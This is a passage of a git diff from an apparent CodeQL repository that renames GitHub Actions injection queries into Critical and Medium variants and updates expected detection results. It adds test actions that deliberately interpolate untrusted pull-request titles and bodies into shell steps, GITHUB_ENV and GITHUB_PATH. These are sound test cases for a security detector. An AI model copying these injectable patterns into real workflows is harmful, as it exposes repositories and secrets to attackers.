"::add-path::$PATHINJ" | +| .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | echo $(echo "$PATHINJ") >> $GITHUB_PATH | +| .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | echo $PATHINJ >> $GITHUB_PATH | +| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | echo ${PATHINJ} >> $GITHUB_PATH | +| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | echo "$(cat foo/bar)" >> $GITHUB_PATH | +| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | Potential PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | echo "::add-path::$PATHINJ" | diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref new file mode 100644 index 000000000000..80f72124fe45 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref @@ -0,0 +1 @@ +Security/CWE-077/EnvPathInjectionCritical.ql diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-077/EnvPathInjection.expected rename to ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref new file mode 100644 index 000000000000..165a3d20896b --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref @@ -0,0 +1 @@ +Security/CWE-077/EnvPathInjectionMedium.ql diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.qlref b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.qlref deleted file mode 100644 index dafc2b38fc46..000000000000 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-077/EnvVarInjection.ql diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected similarity index 71% rename from ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected rename to ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index 8c9d923bd35a..369085708a06 100644 --- a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected @@ -35,14 +35,14 @@ nodes | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | subpaths #select -| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | -| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | -| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | -| .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | -| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | +| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | +| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | +| .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | +| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref new file mode 100644 index 000000000000..b3f6c4bf7822 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref @@ -0,0 +1 @@ +Security/CWE-077/EnvVarInjectionCritical.ql diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected rename to ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref new file mode 100644 index 000000000000..fc6a3a80c984 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref @@ -0,0 +1 @@ +Security/CWE-077/EnvVarInjectionMedium.ql diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.qlref b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.qlref deleted file mode 100644 index ba2d522c03d2..000000000000 --- a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-077/PrivilegedEnvPathInjection.ql diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.qlref b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.qlref deleted file mode 100644 index 4562004b9904..000000000000 --- a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-077/PrivilegedEnvVarInjection.ql diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjection.qlref b/ql/test/query-tests/Security/CWE-078/CommandInjection.qlref deleted file mode 100644 index e38b88f29197..000000000000 --- a/ql/test/query-tests/Security/CWE-078/CommandInjection.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-078/CommandInjection.ql diff --git a/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.expected b/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected similarity index 61% rename from ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.expected rename to ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected index 8829557368bb..e2fe23cccc67 100644 --- a/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.expected +++ b/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected @@ -4,5 +4,5 @@ nodes | .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | subpaths #select -| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential privileged command injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | Potential privileged command injection in $@, which may be controlled by an external user. | .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | +| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential command injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | Potential command injection in $@, which may be controlled by an external user. | .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref b/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref new file mode 100644 index 000000000000..0cdb9a399a84 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref @@ -0,0 +1 @@ +Security/CWE-078/CommandInjectionCritical.ql diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjection.expected b/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-078/CommandInjection.expected rename to ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref b/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref new file mode 100644 index 000000000000..8e1bab538bbf --- /dev/null +++ b/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref @@ -0,0 +1 @@ +Security/CWE-078/CommandInjectionMedium.ql diff --git a/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.qlref b/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.qlref deleted file mode 100644 index 2c7cc5c5fde0..000000000000 --- a/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-078/PrivilegedCommandInjection.ql diff --git a/ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml b/ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml new file mode 100644 index 000000000000..ba7d3eec1af7 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml @@ -0,0 +1,7 @@ +name: 'Test' +description: 'Test' +runs: + using: 'composite' + steps: + - shell: bash + run: echo '${{ github.event.pull_request.body }}' diff --git a/ql/test/query-tests/Security/CWE-094/action2/action.yml b/ql/test/query-tests/Security/CWE-094/.github/actions/action2/action.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/action2/action.yml rename to ql/test/query-tests/Security/CWE-094/.github/actions/action2/action.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml b/ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml new file mode 100644 index 000000000000..510ad86cbfa9 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml @@ -0,0 +1,9 @@ +name: 'Test' +description: 'Test' +runs: + using: 'composite' + steps: + - shell: bash + env: + FOO: ${{ secrets.FOO}} + run: echo '${{ github.event.pull_request.body }}' diff --git a/ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml b/ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml new file mode 100644 index 000000000000..ba7d3eec1af7 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml @@ -0,0 +1,7 @@ +name: 'Test' +description: 'Test' +runs: + using: 'composite' + steps: + - shell: bash + run: echo '${{ github.event.pull_request.body }}' diff --git a/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml b/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml new file mode 100644 index 000000000000..13c246f4ff37 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml @@ -0,0 +1,26 @@ +name: 'Test' +description: 'Test' +inputs: + taint: + description: 'text' + required: true + default: 'Foo' +outputs: + result: + description: "result" + value: ${{ steps.step.outputs.result }} +runs: + using: 'composite' + steps: + - shell: bash + run: echo '${{ github.event.pull_request.body }}' + - name: Step + id: step + env: + FOO: ${{ inputs.taint }} + shell: bash + run: echo "result=$(echo $FOO)" >> $GITHUB_OUTPUT + - name: Sink + id: sink + shell: bash + run: echo "${{ inputs.taint }}" diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required.yml deleted file mode 100644 index b0a1ea5ed685..000000000000 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required.yml +++ /dev/null @@ -1,9 +0,0 @@ -name: '📋' - -on: - pull_request: - branches: [master] - -jobs: - changelog: - uses: ./.github/workflows/changelog.yml diff --git 